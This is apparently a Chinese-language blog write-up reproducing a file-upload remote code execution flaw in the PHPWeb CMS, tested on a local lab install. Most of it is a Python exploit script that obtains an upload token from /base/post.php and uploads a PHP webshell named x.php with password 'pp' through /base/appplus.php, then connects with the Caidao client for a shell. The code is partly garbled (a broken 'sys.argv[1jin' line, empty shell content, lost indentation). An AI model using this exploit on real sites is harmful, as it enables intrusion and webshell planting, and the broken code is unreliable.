环境搭建
phpweb环境搭建很简单,基本就是下一步下一步点点点就可以了。
搭建前需要创建好phpweb对应数据库,如图:
然后前台下一步下一步一直点,安装成功:
前台:http://192.168.242.128/phpweb/3151/
后台:http://192.168.242.128/phpweb/3151/admin.php
复现:
漏洞位于./base/appplus.php文件下,使用exp复现:
python poc.py http://192.168.242.128/phpweb/3151
如图,EXP会在网站./upload/目录下生成一个名为x.php,密码为pp的一句话木马,使用菜刀直接连接,getshell:
**
EXP:
**
# coding: utf-8
# author: print("")
import requests
import re
import os
def Md5(strings):
import hashlib
m = hashlib.md5()
m.update(strings.encode('utf-8'))
return m.hexdigest()
def get_key(uri):
try:
data=requests.post(url=uri,data={"act":"appcode"},timeout=10).text
k=re.findall('k=(.*)&',data)[0]
t=re.findall('t=(.*)',data)[0]
return {"md5":Md5(k+t),"t":t}
except:
print('fail to connect to server')
def send_shell():
data=open('x.php','w')
data.write('')
data.close()
def upload():
send_shell()
get_key22 = get_key(uri)
files = {'file':open('x.php','rb')}
data={'act':'upload','m':get_key22['md5'],'t':get_key22['t'],"path":'upload','r_size':os.path.getsize('x.php')}
try:
r = requests.post(url=upload_url, files=files,data=data).text
print(r)
except:
print('fail to connect to server')
if __name__ == '__main__':
import sys
if not sys.argv[1]:exit('example: python phpweb_rce.py http://127.0.0.1')
url=sys.argv[1jin
uri = url + '/base/post.php'.replace('//', '/')
upload_url = url + '/base/appplus.php'.replace('//', '/')
upload()